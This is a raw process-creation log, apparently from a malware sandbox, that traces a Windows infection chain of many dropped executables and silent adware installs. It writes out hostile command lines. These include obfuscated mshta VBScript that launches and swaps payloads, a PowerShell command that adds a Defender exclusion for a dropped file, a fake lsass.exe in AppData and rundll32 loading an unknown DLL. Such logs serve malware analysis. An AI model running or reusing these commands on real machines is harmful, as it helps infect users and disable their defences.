findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
C:\Users\Admin\AppData\Local\Temp\47F7.exe
C:\Users\Admin\AppData\Local\Temp\47F7.exe
C:\Windows\SysWOW64\PING.EXE
ping YJTUIPJF -n 30
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 5384 -ip 5384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5384 -s 296
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403837 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449&param=721
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffef13646f8,0x7ffef1364708,0x7ffef1364718
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\Documents\G5ALzvAimoQaWqmMr2j_P_qz.exe
"C:\Users\Admin\Documents\G5ALzvAimoQaWqmMr2j_P_qz.exe"
C:\Users\Admin\Documents\uqBqA3XcZ5sg_9EW1k6ZuGcS.exe
"C:\Users\Admin\Documents\uqBqA3XcZ5sg_9EW1k6ZuGcS.exe"
C:\Users\Admin\Documents\ZeYXLCprm73fyj1reQ07cN63.exe
"C:\Users\Admin\Documents\ZeYXLCprm73fyj1reQ07cN63.exe"
C:\Users\Admin\Documents\SfSbUta8c13qZO5oofZJ_k3x.exe
"C:\Users\Admin\Documents\SfSbUta8c13qZO5oofZJ_k3x.exe"
C:\Users\Admin\Documents\LvQgdyIJLnONV7e4PQH2eC5g.exe
"C:\Users\Admin\Documents\LvQgdyIJLnONV7e4PQH2eC5g.exe"
C:\Users\Admin\Documents\jvnotRt_isgC6pRQAPR1WOOx.exe
"C:\Users\Admin\Documents\jvnotRt_isgC6pRQAPR1WOOx.exe"
C:\Users\Admin\Documents\R5x8VcsZb2g9EEybRThwY1b2.exe
"C:\Users\Admin\Documents\R5x8VcsZb2g9EEybRThwY1b2.exe"
C:\Users\Admin\Documents\V1lAQxaN_FsGkrSpMea_jqZA.exe
"C:\Users\Admin\Documents\V1lAQxaN_FsGkrSpMea_jqZA.exe"
C:\Users\Admin\Documents\qz3OG9U739kztTmZTeCA0VN6.exe
"C:\Users\Admin\Documents\qz3OG9U739kztTmZTeCA0VN6.exe"
C:\Users\Admin\Documents\vq1hSEH2lpS45RVDJRUCln0X.exe
"C:\Users\Admin\Documents\vq1hSEH2lpS45RVDJRUCln0X.exe"
C:\Users\Admin\Documents\nGFdjZLe2WmMa0EAa2XH2mRh.exe
"C:\Users\Admin\Documents\nGFdjZLe2WmMa0EAa2XH2mRh.exe"
C:\Users\Admin\Documents\tZdAQU4iXHHyHrzKOooTZOno.exe
"C:\Users\Admin\Documents\tZdAQU4iXHHyHrzKOooTZOno.exe"
C:\Users\Admin\Documents\PCVKx7s5GpNAJMjxhBuYya0l.exe
"C:\Users\Admin\Documents\PCVKx7s5GpNAJMjxhBuYya0l.exe"
C:\Users\Admin\Documents\n5ih3nWiquA7N5FQcShlGmoc.exe
"C:\Users\Admin\Documents\n5ih3nWiquA7N5FQcShlGmoc.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 8ADC9A5973483C6FD94EF5AAB2FDDF48 C
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Documents\mmIvEx2IYQhRvIQ4Rync0mVj.exe
"C:\Users\Admin\Documents\mmIvEx2IYQhRvIQ4Rync0mVj.exe"
C:\Users\Admin\Documents\j3YysndFLFy99bv4IRorHW6c.exe
"C:\Users\Admin\Documents\j3YysndFLFy99bv4IRorHW6c.exe"
C:\Users\Admin\Documents\X4OSbzA6GYp_UUtBCNSsIkng.exe
"C:\Users\Admin\Documents\X4OSbzA6GYp_UUtBCNSsIkng.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Documents\x7UGJTBAX0vBNDcavvut3FPo.exe
"C:\Users\Admin\Documents\x7UGJTBAX0vBNDcavvut3FPo.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 676 -p 3240 -ip 3240
C:\Users\Admin\Documents\4t2ivJzPEyAnSJkw5BmrPRF1.exe
"C:\Users\Admin\Documents\4t2ivJzPEyAnSJkw5BmrPRF1.exe"
C:\Users\Admin\Documents\bTeN5WbDrXBDlM0n_57seP1e.exe
"C:\Users\Admin\Documents\bTeN5WbDrXBDlM0n_57seP1e.exe"
C:\Users\Admin\Documents\S1tImuxOwNJDtbWSIFfTCppo.exe
"C:\Users\Admin\Documents\S1tImuxOwNJDtbWSIFfTCppo.exe"
C:\Users\Admin\Documents\JgZZrAUDPGCwO0Zly4OHXJg8.exe
"C:\Users\Admin\Documents\JgZZrAUDPGCwO0Zly4OHXJg8.exe"
C:\Users\Admin\Documents\w1mMNLX1vOG1MraOp5F91OnY.exe
"C:\Users\Admin\Documents\w1mMNLX1vOG1MraOp5F91OnY.exe"
C:\Users\Admin\Documents\B897mR3zE2X5FsFyEbOeB972.exe
"C:\Users\Admin\Documents\B897mR3zE2X5FsFyEbOeB972.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\vq1hSEH2lpS45RVDJRUCln0X.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\vq1hSEH2lpS45RVDJRUCln0X.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Users\Admin\Documents\9zhrqZQI9Rxvekvjca5GkoUy.exe
"C:\Users\Admin\Documents\9zhrqZQI9Rxvekvjca5GkoUy.exe"
C:\Users\Admin\AppData\Local\Temp\is-GDPLQ.tmp\w1mMNLX1vOG1MraOp5F91OnY.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GDPLQ.tmp\w1mMNLX1vOG1MraOp5F91OnY.tmp" /SL5="$1050A,138429,56832,C:\Users\Admin\Documents\w1mMNLX1vOG1MraOp5F91OnY.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\vq1hSEH2lpS45RVDJRUCln0X.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\vq1hSEH2lpS45RVDJRUCln0X.exe" ) do taskkill -f -iM "%~NxA"
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3240 -s 2200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3712 -ip 3712
C:\Users\Admin\AppData\Local\Temp\9B77.exe
C:\Users\Admin\AppData\Local\Temp\9B77.exe
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 1C221ED7C8CFA84621D2D4DA8645500D
C:\Users\Admin\Documents\LvQgdyIJLnONV7e4PQH2eC5g.exe
"C:\Users\Admin\Documents\LvQgdyIJLnONV7e4PQH2eC5g.exe" -q
C:\Users\Admin\AppData\Local\Temp\is-NF27V.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-NF27V.tmp\Setup.exe" /Verysilent
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-4902K.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-4902K.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403837 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 312
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2232 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2540 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
C:\Program Files\Uninstall Information\CUZRCKRPQL\ultramediaburner.exe
"C:\Program Files\Uninstall Information\CUZRCKRPQL\ultramediaburner.exe" /VERYSILENT
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3132 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\a1-2bacf-8a3-cea95-771ddfbf7ddec\Haefytomugy.exe
"C:\Users\Admin\AppData\Local\Temp\a1-2bacf-8a3-cea95-771ddfbf7ddec\Haefytomugy.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3164 /prefetch:1
C:\Users\Admin\Documents\qz3OG9U739kztTmZTeCA0VN6.exe
C:\Users\Admin\Documents\qz3OG9U739kztTmZTeCA0VN6.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 8012 -ip 8012
C:\Users\Admin\AppData\Local\Temp\is-DL4O3.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DL4O3.tmp\ultramediaburner.tmp" /SL5="$505E0,281924,62464,C:\Program Files\Uninstall Information\CUZRCKRPQL\ultramediaburner.exe" /VERYSILENT
C:\Users\Admin\Documents\ZeYXLCprm73fyj1reQ07cN63.exe
C:\Users\Admin\Documents\ZeYXLCprm73fyj1reQ07cN63.exe
C:\Users\Admin\Documents\G5ALzvAimoQaWqmMr2j_P_qz.exe
"C:\Users\Admin\Documents\G5ALzvAimoQaWqmMr2j_P_qz.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "vq1hSEH2lpS45RVDJRUCln0X.exe"
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2880 -ip 2880
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\72-8eff8-0d5-0b692-badc872059247\Nylaelahywi.exe
"C:\Users\Admin\AppData\Local\Temp\72-8eff8-0d5-0b692-badc872059247\Nylaelahywi.exe"
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
C:\Users\Admin\AppData\Roaming\2139512.exe
"C:\Users\Admin\AppData\Roaming\2139512.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8012 -s 908
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2880 -s 232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 2364 -ip 2364
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 784 -p 4400 -ip 4400
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2364 -s 316
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 4044 -ip 4044
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 4472 -ip 4472
C:\Users\Admin\AppData\Roaming\6859940.exe
"C:\Users\Admin\AppData\Roaming\6859940.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 836 -ip 836
C:\Users\Admin\Documents\X4OSbzA6GYp_UUtBCNSsIkng.exe
"C:\Users\Admin\Documents\X4OSbzA6GYp_UUtBCNSsIkng.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 6368 -ip 6368
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 828 -p 4840 -ip 4840
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 836 -s 292
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 868 -p 5716 -ip 5716
C:\Users\Admin\AppData\Roaming\7592950.exe
"C:\Users\Admin\AppData\Roaming\7592950.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5612 /prefetch:8
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Users\Admin\AppData\Roaming\7637897.exe
"C:\Users\Admin\AppData\Roaming\7637897.exe"
C:\Users\Admin\AppData\Local\Temp\cb8f7621-a82f-47be-9991-72c4ec2cca2b\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\cb8f7621-a82f-47be-9991-72c4ec2cca2b\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\cb8f7621-a82f-47be-9991-72c4ec2cca2b\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5612 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3728 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cb8f7621-a82f-47be-9991-72c4ec2cca2b\test.bat"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3784 -s 272
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 3784 -ip 3784
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " =="" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 7AA90B9143C4A564E28F6D244F67214B C
C:\Users\Admin\AppData\Local\Temp\438F.exe
C:\Users\Admin\AppData\Local\Temp\438F.exe
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{5a4fabfc-b99e-7f4a-9af7-445d488ba628}\oemvista.inf" "9" "4d14a44ff" "0000000000000150" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\maskvpn\driver\win764"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\9B77.exe" -Force
C:\Users\Admin\AppData\Local\Temp\535F.exe
C:\Users\Admin\AppData\Local\Temp\535F.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\9B77.exe
C:\Users\Admin\AppData\Local\Temp\9B77.exe
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
C:\Users\Admin\AppData\Local\Temp\5C97.exe
C:\Users\Admin\AppData\Local\Temp\5C97.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 8712 -ip 8712
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5804 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 4248 -ip 4248
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8712 -s 28
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 288
C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000180" "8399"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Users\Admin\AppData\Local\Temp\7D6F.exe
C:\Users\Admin\AppData\Local\Temp\7D6F.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 8988 -ip 8988
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403837 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8988 -s 876
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 852 -p 4932 -ip 4932
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -start
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4932 -s 2344
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 4052 -ip 4052
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4052 -s 2436
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
